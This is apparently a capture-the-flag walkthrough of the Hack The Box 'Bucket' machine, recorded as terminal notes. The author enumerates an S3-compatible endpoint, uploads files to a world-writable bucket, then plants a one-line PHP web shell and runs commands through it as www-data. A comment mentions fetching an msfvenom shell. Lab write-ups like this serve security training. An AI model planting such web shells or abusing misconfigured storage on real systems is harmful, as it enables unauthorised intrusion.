3 :80 s3.bucket.htb

http://s3.bucket.htb/ | http://s3.bucket.htb/adserver/
{"status": "running"}

http://s3.bucket.htb/adserver/index.html
Returns same page as http://bucket.htb/

$ gobuster dir -u http://s3.bucket.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/health               (Status: 200) [Size: 54]
/shell                (Status: 200) [Size: 0]
/shell.php            (Status: 500) [Size: 158]
/shell.html           (Status: 500) [Size: 158]
/shell.txt            (Status: 500) [Size: 158]

http://s3.bucket.htb/health
{
  "services": {
    "s3": "running",
    "dynamodb": "running"
  }
}

http://s3.bucket.htb/shell/
DynamoDB JavaScript Shell

$ sudo apt install awscli
Using https://docs.aws.amazon.com/cli/latest/userguide/cli-services-s3-commands.html

$ aws s3 --endpoint-url http://s3.bucket.htb ls
2021-11-12 16:05:03 adserve

$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
                           PRE images/
2021-11-12 16:09:04       5344 index.html

$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/images/
2021-11-12 16:09:04      37840 bug.jpg
2021-11-12 16:09:04      51485 cloud.png
2021-11-12 16:09:04      16486 malware.png

# nothing here, trying to write data to s3
$ echo "kashz" > kashz.txt

$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.txt s3://adserver/kashz.txt
upload: ./kashz.txt to s3://adserver/kashz.txt

$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/
                           PRE images/
2021-11-12 16:09:04       5344 index.html
2021-11-12 16:10:26          6 kashz.txt

# text file is uploaded not visible using http://bucket.htb/kashz.txt
# testing .html

$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.html s3://adserver/kashz.html
upload: ./kashz.html to s3://adserver/kashz.html

$ curl http://bucket.htb/kashz.html
kashz

# wolf's web.php didn't work but simple webshell works

$ cat k.php
<?php echo system($_GET["cmd"]); ?>

$ aws s3 --endpoint-url http://s3.bucket.htb cp k.php s3://adserver/
upload: ./k.php to s3://adserver/k.php

# for some reason, this was coming
$ curl http://bucket.htb/k.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at bucket.htb Port 80</address>
</body></html>

$ curl http://bucket.htb/k.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

# shell gets deleted; downloading msfvenom shell, chmod 777 and executing.

$ curl http://bucket.htb/k.php -G --data-urlencode "cmd=whoami;id;hostname;uname -a"
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Last updated